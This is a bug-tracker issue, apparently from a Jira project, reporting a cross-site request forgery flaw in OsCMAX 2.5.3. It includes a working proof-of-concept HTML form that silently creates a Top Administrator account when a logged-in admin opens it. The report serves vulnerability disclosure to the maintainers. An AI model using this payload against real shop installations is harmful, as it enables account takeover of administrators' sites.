Details

    • Type: minor
    • Status: In Progress
    • Resolution: Unresolved
    • Affects versions: v2.5.3
    • Fix versions: None
    • Components: Security Issue
    • Labels:
      None
    • Severity:
      Major

      Description

      Hello,
      OsCMAX 2.5.3 suffers from a cross site request forgery which allows the attacker to add a user.
      CWE-352

      <html>
      <form method="post" name="newmember" action="http://127.0.0.1/catalog/admin/admin_members.php?action=member_new&page=1&mID=1">
      <input type="hidden" name="admin_username" value="THETUNISIAN"/>
      <input type="hidden" name="admin_firstname" value="Moot3x"/>
      <input type="hidden" name="admin_lastname" value="Saad3x"/>
      <input type="hidden" name="admin_email_address" value="g4k@hotmail.esxxx"/>
      <input type="hidden" name="admin_groups_id" value="1"/>
      <!-- About "admin_groups_id" -->
      <!-- 1= Top Administrator -->
      <!-- 2= Customer Service  -->
      <input type='submit' name='Submit4' value="Agregar">
      </form>
      </html>
      

      The attacker can send a link to the admin, so an admin user will be created

        Attachments

          Activity

            People

            • Assignee:
              michael_s Michael Sasek
              Reporter:
              tcyber g4k
            • Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

              • Created:
                Updated:

                Time Tracking

                Estimated:
                Original Estimate - Not Specified
                Not Specified
                Remaining:
                Remaining Estimate - 0 minutes
                0m
                Logged:
                Time Spent - 3 hours, 20 minutes
                3h 20m